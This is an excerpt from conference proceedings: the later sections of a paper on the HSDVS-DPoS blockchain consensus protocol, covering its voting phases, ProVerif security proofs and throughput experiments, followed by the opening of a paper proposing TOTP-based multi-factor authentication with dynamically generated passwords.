There are four phases in the HSDVS-DPoS consensus protocol: the registration phase, the voting phase, the counting phase and the block production phase, shown in Table 2 to Table 5, respectively.
Registration Phase
The registration phase is shown in Table 2:
Table 2. Registration phase
The steps of the registration phase in Fig. 9 are as follows. As a precondition, the node is registered in the P2P network and becomes an ordinary node; if the Token of the ordinary node is greater than 0, its role is transformed into a stakeholder node.
1. A stakeholder node S sends message 1: Address to R.
2. R receives message 1: Address from S and queries the Token of S using the Address of S. If the Token is greater than 0, R sends message 2: a blank Ballot to S; otherwise, nothing is sent.
3. R scans the information of the witness candidate nodes to form ListW and sets the range of witness candidate nodes to the stakeholder nodes. R generates the ballot using ListW as message 3: response.
4. R scans the information of S, uses krc to encrypt ListS, and sends the result to the counting node C as message 4. krc is a secret key shared by R and C.
5. C responds. This corresponds to message 5 in Fig. 9.
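The qualification check and the construction of ListS in the steps above can be sketched as follows. This is a simplified illustration, not the authors' implementation: the ledger is assumed to be a dictionary from Address to Token, the Address doubles as the identity in ListS, and the encryption of ListS under krc is omitted. All names are hypothetical.

```python
def register(address, ledger, list_w):
    """Return a blank ballot if the node at `address` holds Token > 0, else None."""
    token = ledger.get(address, 0)
    if token <= 0:
        return None  # not qualified: no ballot is sent
    # Blank electronic ballot: ListW plus one default state bit per candidate.
    return {"ListW": list(list_w), "state": [0] * len(list_w), "timestamp": None}

def build_list_s(ledger):
    """Collect identity and Token of every stakeholder node (Token > 0)."""
    return [{"ID": addr, "Token": tok} for addr, tok in ledger.items() if tok > 0]
```

In the protocol, the list returned by `build_list_s` would be encrypted with krc before being sent to the counting node C.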
Fig. 9. Registration phase. Message labels in the figure, among stakeholder node S, registration node R and counting node C: (1) send(Address); (2) send(Ballot); (3) send Ballot(ListW); (4) send encrypt(ListS); (5) response.
Voting Phase
The voting phase is shown in Table 3. The steps of the voting phase in Fig. 10 are as follows:
1. S generates message 1: (s, Ballot) for a witness candidate node WitCan_i in ListW and sends it to C. When S selects a witness candidate node in ListW, the state bit at the corresponding position is set to 1, and the timestamp is generated automatically by the system. Here, s = (σ, m) and σ = sig(PK_S, SK_S, PK_C).
2. C responds. This corresponds to message 2 in Fig. 10.
Table 3. Voting phase
Fig. 10. Voting phase. Message labels in the figure, between stakeholder node S and counting node C: (1) send(s, Ballot); (2) response.
Counting Phase
The counting phase is shown in Table 4. The steps in the counting phase are as follows:
1. Before the ballots are counted, repeated ballots and invalid ballots are removed according to the counting rules. Only valid ballots are counted. C calculates the results, and the top N witness candidate nodes are selected as witness nodes.
2. C first verifies the stakeholder node's signature s = (σ, Ballot), where σ = sig(PK_S, SK_S, PK_C), using its private key SK_C and the public key PK_S of S to determine whether the signature is valid. If it is valid, C uses Formula (1) to count the ballot according to the weight of S. After that, C generates a signature simulation s' = (σ', m), where σ' = sig(PK_S, SK_C, PK_C).
3. C publishes the results of the count, together with the signatures for ballots (s, Ballot) and the signature simulations for ballots (s', Ballot).
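The stake-weighted count and the selection of the top N candidates can be sketched as below. The sketch reads Formula (1) as "each candidate receives the sum of the Token of the stakeholder nodes whose ballot sets that candidate's state bit", which is an interpretation. The input shapes, the function names and the tie-break by identity are assumptions, and signature verification is taken as already done.

```python
def tally(ballots, list_s, list_w):
    """ballots: list of (stakeholder_id, state_bits); list_s: {stakeholder_id: Token}."""
    votes = {cid: 0 for cid in list_w}
    for voter_id, state in ballots:
        token = list_s[voter_id]                 # weight of the stakeholder node
        for cid, bit in zip(list_w, state):
            votes[cid] += token * bit            # Token * status, summed per candidate
    return votes

def select_witnesses(votes, n):
    """Top N candidates by votes; ties broken by identity (an assumption)."""
    ranked = sorted(votes, key=lambda cid: (-votes[cid], cid))
    return ranked[:n]
```

With these inputs, two small stakeholders voting for the same candidate can still be outvoted by one large stakeholder, which is the stake-proportional behaviour the counting phase describes.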
Table 4. Counting phase
Block Production Phase The Block production phase is shown in Table 5: Table 5. Block Production Phase
The steps of the block production phase are as follows: Once witness candidate nodes are selected as witness nodes, they produce blocks with equal rights, independent of the number of ballots obtained in the counting phase.
These N witness nodes take turns being responsible for the bookkeeping. The witness nodes are assigned an order and participate in block production in that order. If the witness node Witness_i does not produce a block within its given time slot, the next witness node in the assigned order, Witness_{i+1}, takes over block production. Each time a witness node acts as a block producer node, it is responsible for producing only one block. The produced blocks are passed to the next witness node in the order in which blocks are produced. The second witness node packs the new block and confirms the transaction contents of the previous block. When a block is confirmed by more than 2/3 of the total number of witness nodes, it becomes irreversible, that is, it becomes a block on the blockchain.
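The turn-taking and the 2/3 confirmation rule can be sketched as follows. The slot numbering, the `missed` set and the function names are hypothetical; the sketch only assumes that witnesses are kept in their assigned order.

```python
def next_producer(witnesses, slot, missed=frozenset()):
    """Round-robin: slot k belongs to witnesses[k % N]; a witness that misses
    its slot is skipped in favour of the next one in the assigned order."""
    n = len(witnesses)
    for offset in range(n):
        candidate = witnesses[(slot + offset) % n]
        if candidate not in missed:
            return candidate
    return None  # no witness is available

def is_irreversible(confirmations, n_witnesses):
    """True when strictly more than 2/3 of the witness nodes confirmed the block."""
    return 3 * confirmations > 2 * n_witnesses
```

Integer arithmetic is used in `is_irreversible` so that the boundary case of exactly 2/3 is not affected by floating-point rounding.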
5 Discussion
This section focuses on the problems of the current DPoS consensus protocols [3, 9–11], namely no consideration of vote buying and candidate cheating and no support for a heterogeneous cryptography communication mechanism, and discusses the corresponding solutions in HSDVS-DPoS.
5.1 Counting Phase
In DPoS consensus protocols [3, 9–11, 13–17], the number of votes of a stakeholder node is determined by its stake: the number of votes is proportional to the stake. The DPoS consensus protocol uses the approval voting mechanism, in which each account is allowed one vote per share per witness, and the top N are selected as witness nodes. N is defined such that at least 50% of the stakeholders participating in voting believe that there is sufficient decentralization. Stakeholder nodes should vote for at least M witness nodes when they explicitly declare the number M. This raises the problem that nodes with more stake have greater influence. In order to address this problem, the counting phase is introduced in the proposed HSDVS-DPoS consensus protocol. In the counting phase, the number of votes is directly proportional to the stake, which is converted into a proportion of votes. Formula (1) is used to count votes when the received ballots are counted. To handle stakeholder nodes that do not vote actively, ballots received after a preset timestamp are not counted. Otherwise, in the worst case, the voting phase would never end, because the counting node would wait indefinitely for stakeholder nodes that never vote. The end of the voting phase is therefore fixed at a preset timestamp so that the voting phase is controlled. The number of votes obtained by a witness candidate node is calculated as shown in Formula (1):
$$\mathit{vote} = \sum_{i=m}^{t} \mathrm{Token}(ID_i) \cdot \mathrm{status}(ID_i) \qquad (1)$$
where $\sum_{i=m}^{t} \mathrm{Token}(ID_i)$ is the sum of the stake of the stakeholder nodes that vote for the witness candidate node ID_i, and status(ID_i) is the status of the witness candidate node with identity ID_i, whose value is 1. Hence, the proposed HSDVS-DPoS consensus protocol has a voting phase.
5.2 Rules of Counting
Ballots are divided into valid Ballots, invalid Ballots and repeated Ballots. Only valid ballots are counted.
1. Valid Ballot: the following four conditions are all met.
• There is no blank data item in the Ballot.
• The signature of the stakeholder node is verified successfully.
• timestamp ≤ deadline holds, so the timestamp is valid.
• The number of state bits set to 1 in the Ballot, denoted status, is 1.
2. Invalid Ballot: any one of the following four conditions is met.
• There is a blank data item in the Ballot.
• The signature of the stakeholder node cannot be verified successfully.
• timestamp > deadline holds, so the timestamp is invalid.
• status is 0.
3. Repeated Ballot: any one of the following conditions is met.
• The number of state bits set to 1 in the Ballot is at least 2 (status ≥ 2).
• There is more than one timestamp in the Ballot.
• The same signature appears in two different ballots, that is, a stakeholder node has voted twice.
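The three categories above can be sketched as a single classification function. The dictionary layout of a ballot, the order in which the rules are checked (repeated first, then invalid) and all names are assumptions made for illustration; `signature_ok` stands for the result of the designated verifier's signature check.

```python
def classify_ballot(ballot, deadline, signature_ok, seen_signatures):
    """Return 'valid', 'invalid' or 'repeated' for one ballot.

    ballot: dict with keys 'ListW', 'state', 'timestamps', 'signature'.
    seen_signatures: signatures of ballots that were already received.
    """
    state = ballot.get("state") or []
    timestamps = ballot.get("timestamps") or []
    signature = ballot.get("signature")
    status = sum(state)  # number of state bits set to 1

    # Repeated: status >= 2, more than one timestamp, or a reused signature.
    if status >= 2 or len(timestamps) > 1 or signature in seen_signatures:
        return "repeated"

    # Invalid: blank item, failed signature check, late timestamp, or status 0.
    blank = not ballot.get("ListW") or not state or not timestamps or signature is None
    if blank or not signature_ok or timestamps[0] > deadline or status == 0:
        return "invalid"

    return "valid"
```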
6 Security Analysis
In this section, the security of the proposed HSDVS-DPoS consensus protocol, including authentication, secrecy, anonymity, fairness, verifiability, coercion-resistance and receipt-freeness, is analyzed. First, authentication and secrecy are analyzed. Then, under the condition that the registration node and the counting node are honest, anonymity, fairness, verifiability, coercion-resistance and receipt-freeness are analyzed.
6.1 Authentication and Secrecy
Authentication and secrecy are analyzed with ProVerif [25], a formal tool for analyzing protocol security developed by Bruno Blanchet. ProVerif is an automatic cryptographic protocol verifier based on a representation of the protocol by Horn clauses and the applied pi calculus. When ProVerif cannot prove a security property, it can reconstruct an attack. ProVerif can prove secrecy, authentication and, more generally, correspondence properties. ProVerif models authentication as non-injective agreement, expressed by a query of the form event1 ==> event2. The query holds when, whenever event1 has been executed, event2 must have been executed before it. Here we use the queries in Fig. 11 to express the mutual authentication between registration node R and counting node C, and between registration node R and stakeholder node S, in the HSDVS-DPoS consensus protocol. In the HSDVS-DPoS consensus protocol, the secrecy of krc, sks and skc needs to be verified. krc is the key shared between registration node R and counting node C, sks is the private key of the stakeholder node, and skc is the private key of the counting node. We use the statements query attacker:krc, query attacker:sks and query attacker:skc in ProVerif to verify the secrecy of krc, sks and skc, respectively. The secrecy and authentication queries in ProVerif are shown in Fig. 11.
    query attacker:krc; (*the secrecy of share key*)
    query attacker:sks; (*the secrecy of private key*)
    query attacker:skc. (*the secrecy of private key*)
    query ev:endauthR(x,y) ==> ev:beginauthR(x,y).
    (*registration node R authenticates counting node C*)
    query ev:endauthC(x,y) ==> ev:beginauthC(x,y).
    (*counting node C authenticates registration node R*)
    query ev:endauthS(x,y,z,t) ==> ev:beginauthS(x,y,z,t).
    (*registration node R authenticates stakeholder node S*)
    query ev:endauthS(x) ==> ev:beginauthS(x).
    (*stakeholder node S authenticates registration node R*)
Fig. 11. Secrecy and authentications in ProVerif
First, the HSDVS-DPoS consensus protocol is formalized in the applied pi calculus and translated into ProVerif input; then authentication and secrecy are analyzed. The results for authentication and secrecy in Table 6 and Table 7 are all 'TRUE', which shows that the protocol provides mutual authentication between registration node R and counting node C and between registration node R and stakeholder node S, as well as secrecy of krc, sks and skc.
Table 6. Authentications
Non-injective agreement | Authentications | Result
event(endauthR(x,y)) ==> event(beginauthR(x,y)) | registration node R authenticates counting node C | TRUE
event(endauthC(x,y)) ==> event(beginauthC(x,y)) | counting node C authenticates registration node R | TRUE
event(endauthS(x,y,z,t)) ==> event(beginauthS(x,y,z,t)) | registration node R authenticates stakeholder node S | TRUE
event(endauthS(x)) ==> event(beginauthS(x)) | stakeholder node S authenticates registration node R | TRUE
Table 7. Secrecy
Event | Secrecy | Result
query attacker(krc) | shared key krc between registration node R and counting node C | TRUE
query attacker(sks) | private key sks of stakeholder node S | TRUE
query attacker(skc) | private key skc of counting node C | TRUE
6.2 Anonymity
Definition: Anonymity means that the identity of the voter is kept private while voting.
Proof: During the voting process, the stakeholder node sends the signature together with the padded ballot, which is not directly related to its real identity. After the ballots are published in the counting phase, the stakeholder node is also unable to prove to other people which ballot is its own.
6.3 Fairness
Definition: Fairness means that no one knows the current results of the voting phase.
Proof: In the counting phase adopted by the HSDVS-DPoS consensus protocol, the counting node processes the received votes only after the timestamp that ends the voting phase is reached; it then counts the valid votes and publishes the results. Therefore, no one knows the current results of the voting phase before the votes and results are made public.
6.4 Verifiability
Definition: Verifiability means that a voter can check that its own ballot has been counted.
Proof: The signatures with ballots, as well as the signature simulations with ballots, are made public. A signature with a ballot is generated by the voter itself, so a stakeholder node is able to find its own signature and ballot and thereby determine whether its vote has been counted.
6.5 Receipt-Freeness
Definition: Receipt-freeness means that the voter cannot produce a receipt to prove that it cast a particular ballot. Its purpose is to protect against vote buying.
Proof: The ballot is published, and the counting node can produce a signature simulation s'. Both the signature s with the ballot and the signature simulation s' with the ballot pass verification. First, a third party cannot trust the counting node, because the information disclosed by the counting node includes both signatures with ballots and signature simulations with ballots, and the existence of the signature simulations makes the true source of a signature indistinguishable. Moreover, the third party cannot verify the validity of the signatures or signature simulations without the private key of the counting node. Second, even if stakeholder nodes are bribed or threatened by an attacker and choose to vote for a particular witness candidate node A, there is no receipt that can prove that one of the votes was cast by a given stakeholder node. A stakeholder node only knows the signature with ballot that it generated and cannot prove this fact to a third party. Because there are two signatures, the third party does not know which one is the true one. Therefore, bribery fails. Finally, even if stakeholder nodes send their own private keys to the third party, verifying the signature still requires the counting node's private key. A stakeholder node can only find its voting information among the published data and cannot verify whether another signature is true. Because the signature simulation also verifies successfully, the attacker cannot fully trust the stakeholder node. Furthermore, from the privacy perspective, handing over a private key is very unlikely. Control of an account depends on the account's private key, so if a stakeholder node sends its private key to a third party, that party may take control of the account and vote by itself, which puts the stakeholder node at a disadvantage.
6.6 Coercion-Resistance
Definition: Coercion-resistance means that voters vote without being threatened by the attacker.
Proof: There is no receipt that can be used to prove that the vote cast by a stakeholder node is a particular one, so it is impossible to prove this to a third party.
7 Experiment
In order to better compare HSDVS-DPoS with other DPoS consensus protocols, this section presents the overall design, the throughput and the time spent on block production for the proposed HSDVS-DPoS consensus protocol.
7.1 Overall Design
Windows 10 64-bit, the Eclipse software and the Java programming language are used as the experimental environment to simulate the HSDVS-DPoS consensus protocol. The framework design of the test application that implements the HSDVS-DPoS consensus protocol is shown in Fig. 12. The consensus layer adopts the proposed HSDVS-DPoS consensus protocol. The network layer uses sockets and ports to simulate the sending and receiving of messages among blockchain network nodes. The data layer adopts an encryption algorithm and a hash function to encrypt and decrypt data.
Fig. 12. Design of test framework (consensus layer: HSDVS-DPoS consensus; network layer: port, socket; data layer: encryption algorithm, hash function).
7.2 Experimental Evaluation
This section analyzes the performance of the proposed HSDVS-DPoS consensus protocol using two evaluation indexes: throughput and time spent on block production. Since the proposed protocol adopts the heterogeneous designated verifier signature, we assume that the stakeholder node is in the PKI environment and the counting node is in the IBC environment.
Throughput: represents the time cost to record all operations in each phase of each consensus round. Let MT be the total number of messages and TotalTime the total time spent, in seconds. The throughput TPS, measured in s/piece, is calculated according to Formula (2):
$$\mathrm{TPS} = \frac{\mathrm{TotalTime}}{MT} \tag{2}$$
Under this definition, a larger TPS value means that more time is spent per message.
Block production time: represents the time cost to produce blocks. Let Time be the total time spent on the consensus operation and count the number of blocks produced in the block production phase. The time spent on block production, measured in s/each block, is calculated according to Formula (3):
$$\mathit{producetime} = \frac{\mathrm{Time}}{\mathit{count}} \tag{3}$$
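As a minimal sketch of Formulas (2) and (3), the two indexes can be computed as shown below. The function names and the sample numbers are hypothetical and are not taken from the experiment; only the two ratios follow the definitions above.

```python
def throughput_tps(total_time_s: float, message_count: int) -> float:
    """Formula (2): average time per message, in s/piece."""
    if message_count <= 0:
        raise ValueError("message_count must be positive")
    return total_time_s / message_count


def produce_time(time_s: float, block_count: int) -> float:
    """Formula (3): average time per produced block, in s/each block."""
    if block_count <= 0:
        raise ValueError("block_count must be positive")
    return time_s / block_count


# Hypothetical illustration values (not measured data).
tps = throughput_tps(total_time_s=1200.0, message_count=10)
per_block = produce_time(time_s=60.0, block_count=10)
print(tps, per_block)
```

Because both indexes are time-per-item ratios, a rising value of either one corresponds to slower processing.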
The number of nodes in the first experiment is set to 15, so the simulated blockchain network contains 15 nodes in total. Three witness candidate nodes are elected as witness nodes by voting, that is, N = 3. The result is shown in Fig. 14: the throughput is maintained at 50–60 s/piece.
C. Zhao et al.
Figure 13 shows the throughput for 15, 100, 500, 1000, 3000, 5000, and 10000 nodes, with the number of consensus rounds set to 20. When the number of nodes is 100, the throughput is maintained at 50–60 s/piece. It is maintained at 120–140 s/piece for 300 nodes, at 110–130 s/piece for 500 nodes and for 1000 nodes, at 120–150 s/piece for 3000 nodes, at 130–150 s/piece for 5000 nodes, and at 130–170 s/piece for 10000 nodes.
Fig. 13. Throughput for different numbers of nodes
When the number of nodes is 300, 500, or 1000, the throughput is relatively stable: its values vary little and remain at 110–140 s/piece. When the number of nodes is 3000 or 5000, the throughput is maintained at 120–150 s/piece; compared with the values for 300, 500, and 1000 nodes, the throughput values show an obvious increasing trend. When the number of nodes is 10000, the throughput is maintained at 130–170 s/piece. As the number of nodes increases significantly, the throughput values keep increasing, which indicates that the time needed to process each message grows and the effective throughput decreases.
7.3 Experimental Results and Analysis
This section sets different numbers of nodes in order to simulate blockchain networks of different scales. The throughput and the time spent on block production of the application implementing the proposed HSDVS-DPoS consensus protocol are measured when the number of nodes is 100, 300, 500, 1000, 2000, 3000, 4000, 5000, and 10000. Furthermore, the number of blocks in the block production phase is set according to the scale of nodes. To reduce the experimental deviation, the number of consensus rounds is set to 20 and the experimental results are averaged. The resulting experimental data are shown in Table 8.
Table 8. Experimental data
Number of nodes   Throughput (s/piece)   Time spent on block production (s/each block)
15                50.2270                6
100               117.7329               7
300               121.6780               8
500               103.7312               9
1000              120.6829               9
2000              123.6768               10
3000              133.6585               10
4000              136.1063               10
5000              137.9023               12
10000             146.0100               16
Table 8 shows that the throughput of the application is 50.227 s/piece when the number of nodes is 15, which is the shortest time spent on a message and therefore the fastest message processing. As the number of nodes increases, the throughput values increase gradually. When the number of nodes is between 100 and 10000, the throughput values lie in the range 104–146 s/piece. According to Fig. 14, when the number of nodes is 100, 300, 500, 1000, or 2000, the throughput of the application is relatively stable and remains at 104–123 s/piece with only small changes. When the number of nodes increases to 3000, 4000, 5000, and 10000, the throughput remains at 123–146 s/piece and the throughput values begin to increase significantly: the time to process a message is prolonged, message processing slows down, and the effective throughput decreases significantly.
As seen from Table 8, the block production time is relatively stable when the number of nodes is 100, 300, 500, 1000, or 2000. The time spent on block production is 6 s/each block for 15 nodes, 7–8 s/each block for 100 and 300 nodes, 9 s/each block for 500 and 1000 nodes, 10 s/each block for 2000, 3000, and 4000 nodes, 12 s/each block for 5000 nodes, and 16 s/each block for 10000 nodes. According to Fig. 15, the time spent on block production increases gradually as the number of nodes grows from 15 to 4000, and it increases sharply when the number of nodes grows from 5000 to 10000.
Fig. 14. Tendency of throughput.
Fig. 15. Tendency of time spent in block production.
The changes in throughput and in time spent on block production can be explained as follows. In the voting phase, stakeholder nodes employ the heterogeneous designated verifier signature scheme to generate signatures. Signature generation involves many kinds of operations, including bilinear pairing computation, which is the most time-consuming of them. When the number of nodes increases, the number of stakeholder nodes also increases; accordingly, the number of signatures sent increases, as does the time consumed. In the counting phase, after the counting node has counted the ballots, not only the signatures and ballots but also the simulated signatures and ballots must be published, which consumes significantly more time. Moreover, the number of messages increases with the number of nodes. When the number of nodes is 100, 300, or 500, the increase in the elapsed time of the voting and counting phases is small. When the number of nodes increases to 2000, 3000, 4000, 5000, and 10000, the elapsed time of the voting and counting phases increases significantly. As a result, the throughput values increase (that is, the effective throughput decreases) and the time spent on block production increases. When the number of nodes ranges from 15 to 5000, the throughput and the time spent on block production are stable. When the number of nodes is greater than 5000, the throughput decreases and the time to produce blocks increases.
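The ranges quoted in this analysis can be re-derived from Table 8. The following sketch only restates the table rows and computes minima, maxima, and a monotonicity check; the helper names are hypothetical and not part of the original experiment code.

```python
# Rows of Table 8: (number of nodes, throughput in s/piece, block time in s/each block).
TABLE_8 = [
    (15, 50.2270, 6), (100, 117.7329, 7), (300, 121.6780, 8), (500, 103.7312, 9),
    (1000, 120.6829, 9), (2000, 123.6768, 10), (3000, 133.6585, 10),
    (4000, 136.1063, 10), (5000, 137.9023, 12), (10000, 146.0100, 16),
]


def throughput_range(low_nodes: int, high_nodes: int) -> tuple:
    """Return (min, max) throughput for node counts in [low_nodes, high_nodes]."""
    values = [tps for nodes, tps, _ in TABLE_8 if low_nodes <= nodes <= high_nodes]
    return min(values), max(values)


def block_time_is_non_decreasing() -> bool:
    """Check that block production time never drops as the node count grows."""
    times = [block_time for _, _, block_time in TABLE_8]
    return all(a <= b for a, b in zip(times, times[1:]))


print(throughput_range(100, 2000))
print(throughput_range(3000, 10000))
print(block_time_is_non_decreasing())
```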
8 Conclusion
With the popularity of blockchain applications, blockchain security has drawn wide attention and has become a hot issue. Consensus is a key part of a blockchain because it aims to reach agreement on block production. However, with the rapid development of heterogeneous blockchains and IoB, the requirement for secure and heterogeneous consensus is becoming more and more urgent. To address vote buying and the lack of support for heterogeneous cryptographic communication, coercion-resistance and receipt-freeness are introduced into consensus, based on ideas from electronic voting. The HSDVS-DPoS consensus protocol is then presented and analyzed. The proposed protocol provides authentication, secrecy, anonymity, fairness, verifiability, coercion-resistance, and receipt-freeness. The experimental results show that when the number of nodes is between 15 and 5000, the throughput and the block production time stay stable and change within a small range. When the number of nodes is larger than 5000, the throughput decreases and the block production time is prolonged. In the future, we will focus on improving the efficiency of the proposed HSDVS-DPoS consensus protocol.
Funding. This research was supported in part by the National Key R&D Program of China No. 2020YFC1522900; the Fundamental Research Funds for the Central Universities No. CZZ21001 and No. QSZ17007; and the Natural Science Foundation of Hubei Province under grant No. 2018ADC150.
Framework for Multi-factor Authentication with Dynamically Generated Passwords
Ivaylo Chenchev
University of Telecommunications and Post, Sofia, Bulgaria
Abstract. One of the oldest authentication methods is the password. The password represents the knowledge element: something you should know in order to be authenticated. It has been present in scientific publications for many years. Password authentication was the only method in the early years, when the UNIX operating systems originated. Even nowadays, it can hardly be bypassed. It is still used as the single authentication method in many systems. If a particular scenario has higher security requirements, it is combined with other authentication methods to form two-factor or multi-factor authentication. Usually, the passwords are stored in an encrypted format locally on the server where the users are authenticated. Another authentication technique, Time-based One-Time Password (TOTP), generates different passcodes that are valid for a pre-set short period. Both techniques can be deployed at zero cost. Password authentication is one of the oldest and almost universal authentication methods. The paper suggests an approach for dynamically generated passwords that are not stored anywhere and presents a framework for authentication based on combining OTP passcodes and classical passwords. This framework can be used for both user and P2P (host-to-host) authentication.
Keywords: Authentication · OTP · TOTP · Password · Two-Factor · 2FA · Multi-Factor · MFA · Security · Hash-Chain · Hash · SHA2 · SHA3
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 563–576, 2023. https://doi.org/10.1007/978-3-031-28073-3_39
1 Introduction
Almost every system exposed to the public Internet can become subject to multiple and varied attacks, such as offline dictionary attacks, man-in-the-middle phishing attacks, pre-computation attacks, cybersecurity threats [3], and others. The exposure depends on the purpose of the system and its importance, usage, the type of information processed and stored, the number of users, availability requirements, etc. In general, every system must be hardened. A system can be secured with different techniques: starting with the environment in which it will run and the system's architecture and topology; adding network protection mechanisms such as local and global firewalls; defining and using different access zones and access levels; using proper Identity and Access Management (IAM); using Multi-Factor Authentication (MFA); and many more. A system exposed to the Internet in this way will probably have to manage many users, and the users must be authenticated before they are given any access. One of the oldest authentication methods is based on classical passwords. The research in [25] reflects on the issue of password authentication and tries to answer the question of whether we will ever stop using passwords. The paper argues that the more passwords we have to use, the less able we are to use them as we should: we may make poor password choices (for example, very short passwords), share them with friends or colleagues, fail to update them regularly, or use the same password on multiple systems. The author notes that passwords and PINs have almost universal applicability and that password authentication can be deployed at no cost. Finally, Steven Furnell concludes that there is no single solution and that passwords will not disappear soon. Seven years have passed since that study, and passwords and PINs are still widely used as authentication techniques. We will not get rid of passwords soon. Until then, research can continue on improving the existing methods.
The framework for multi-factor authentication with dynamically generated passwords presented in this paper inherits the benefits of the OTP authentication technique. The OTP passcodes are not stored anywhere, and the authenticating parties do not have to memorize passcodes or passwords. The Time-Based One-Time Password (TOTP) uses the current time as a unique element, which provides randomness. In turn, the generated OTP passcode provides some of the initial values for the generation of the two classical passwords. The classical passwords are obtained from the last elements of two dynamically generated hash chains. The hash chains have different initial strings and different lengths every time they are calculated.
When there is an authentication attempt, an OTP passcode is generated, and two hash chains are generated from it. The OTP passcode could, in general, be classified as an “I know” element because it yields a passcode that is then entered. However, the “shared initial string” must be shared between the client and the server in the synchronization phase, so the OTP is used here as an “I have” element. The classical passwords provide the “I know” element. Together, the two parts provide two factors for multi-factor authentication. The one-time passcodes generated by the TOTP technique are not saved because they are a function of the current time, that is, the moment the authentication starts. The two classical passwords are not stored anywhere either, because they are a function of the generated OTP passcode. In other words, they are generated in real time. The research focuses on MFA with both OTP passcodes and classical passwords because of the following key points:
• They are easy to use and implement.
• They are easy to configure: the length of the classical password can be changed easily, and the validity period of the OTP passcodes can be configured.
• TOTP provides the randomness.
• No passwords are saved anywhere.
• Both are easy to deploy and come at no cost.
The paper consists of an Introduction; a chapter “Literature Review”; a chapter “Challenges and Limitations of the Existing Approaches”; a chapter “The Proposed Authentication Idea”, describing the framework for two-step and three-step authentication with dynamic password generation; a chapter “Experimental Environment”, describing the environments used for the tests; Results; Conclusion; Further Research; Acknowledgement; and References.
2 Literature Review
The authors of [23] review the security of UNIX passwords and propose using strong passwords that cannot be easily repeated, together with a so-called “salted password”, a method that encrypts a password and then stores it in encrypted form inside the UNIX host(s). Another paper [24] also reviews the use of salted passwords to create strong passwords from weak ones. In [25], the author tries to answer whether we will ever stop using passwords. Some authors go further and review how users choose passwords under emotional stress (either stress or fear) [26]. Some novel research on authentication and identification concerns the way users press keys on the keyboard (keystroke dynamics) [27, 28]. The complexity, quality, and strength of passwords are reviewed in [29–33]. The research in [34], a paper from 1969, states that the real problem with access management is the authentication of the user's identity. That paper cites two reference documents, [35] and [36], in which one-time passwords are evaluated; both authors suggest using any password only once. Another paper [45], from 1967, proposes using one-time passwords from previously prepared lists of randomly generated passwords. A similar suggestion for one-time password usage can be found in Leslie Lamport's paper [39]. He proposes creating a certain number of passwords written in local files on both sides (the client and the server); on every authentication attempt from the client, the password used is marked as used and is never used again. When all passwords from the generated list have been used, another list must be generated and securely distributed between the hosts. Using one-time passwords is good from a security point of view, but this proposal has some weaknesses:
• The password list must be generated in a secure environment.
• The list must be distributed to both the client and the server, after which access to it must be restricted.
• The number of passwords in the list has to be chosen carefully: not too small, because new lists would then have to be generated often, and not too large, because an attacker who somehow gains access to the client would then have more time to try to exploit the list.
The number of authentication techniques and methods is huge. A few of them are: Personal Identification Number (PIN) [1], Personal Identification Pattern (PIP) [2], Transaction Authentication Numbers (TAN), image recognition [4–11], QR codes hidden in color images [12], Time-based One-Time Passwords (TOTP), two-factor authentication (2FA) [16, 22], multi-factor authentication (MFA) [17, 18, 20, 21], multi-factor password authentication with key exchange [13], biometrics-based methods [1] (including fingerprint and palmprint, face recognition, iris recognition, electrocardiographic signals, voice, keystroke and touch dynamics), certificate-based methods, smart cards, tokens, techniques based on age [15, 19] and for older users [14], techniques for people with different disabilities, etc.
One of these techniques that attracts attention is TOTP, because more and more systems use it for authentication, mostly in combination with other methods in 2FA or MFA. TOTP is a computer algorithm that generates a one-time password/passcode (OTP). The algorithm is standardized by the Internet Engineering Task Force (IETF) [37]. TOTP is an extension of the HMAC-based One-Time Password (HOTP) algorithm defined in [38]. Instead of a counter, it uses the current time, which allows shorter validity intervals for the produced OTP passcodes and therefore enhances security. The TOTP algorithm relies on a so-called “shared secret” value, which must be known to both parties involved in the authentication (a client and a server, or two hosts that must authenticate to each other, etc.). The shared secret must be transferred only once between the client and the server to establish synchronization, and it must be kept strictly protected afterwards; otherwise, an attacker can generate new valid OTP values at any time. The shared secret could be changed often (for example, after every N passcodes, with N known to the client and the server) to minimize the probability of an attack. Securing the communication channel between the client and the server is not in the scope of this research, but it is the most crucial surrounding component when initiating the TOTP synchronization between the client and the server. TOTP uses the current time as a unique value, and the generated passcode is valid for a specific short interval (between 30 s and 90 s).
The RFC document [37] recommends a default time-step value of 30 s as a balance between security and usability. Some implementations of the TOTP algorithm allow the minimum value to be set to 1 s. The TOTP algorithm takes as input the shared secret value and the “current time” (the moment when the client initiates the authentication process). Usually, the generated OTP passcode has between 4 and 8 digits; most often, its length is six.
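The TOTP computation described above can be sketched with the Python standard library only. This is a minimal illustration that follows the published HOTP/TOTP construction (HMAC over a time-step counter followed by dynamic truncation); it is not the implementation used in the paper's experiments, which mention the pyotp library. The function names are hypothetical, HMAC-SHA-1 is assumed as the default, and the secret shown is the ASCII test secret from the RFC test vectors.

```python
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6, algorithm: str = "sha1") -> str:
    """HMAC-based one-time password for an 8-byte big-endian counter."""
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod=algorithm).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble of the last byte
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, now=None, step: int = 30, digits: int = 6,
         algorithm: str = "sha1") -> str:
    """Time-based OTP: HOTP over the number of elapsed time steps."""
    if now is None:
        now = time.time()
    return hotp(secret, int(now) // step, digits, algorithm)


# RFC test secret and timestamp; prints 94287082 for 8 digits at t = 59 s.
print(totp(b"12345678901234567890", now=59, digits=8))
```

Client and server obtain the same passcode only if they share the secret and their clocks fall in the same time step, which is why time synchronization matters for this technique.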
3 Challenges and Limitations of the Existing Approaches
The authors of [40] define five components of a secure distributed system and review them from the authentication perspective. To obtain some “reasonable security”, a set of assumptions is proposed. Their authentication is based on a tamperproof cryptographic facility (a smart card) containing public and private keys protected with a PIN. Another framework [41] presents a systematic approach to designing three-factor authentication for distributed systems; it consists of smart-card and password authentication and includes biometrics. Other works, such as [42, 43], review the authentication of users in cloud infrastructures and propose frameworks for it. The framework in [42] includes smart cards as a component for authentication, while [43] suggests using mobile phones, captcha expressions, OTP passcodes, and the IMEI number of the mobile phone in use. This authentication is applicable only if the client who initiates the authentication is a human with a mobile phone. Other authors [44] rely on users' biometrics in their proposal for multi-factor authentication.
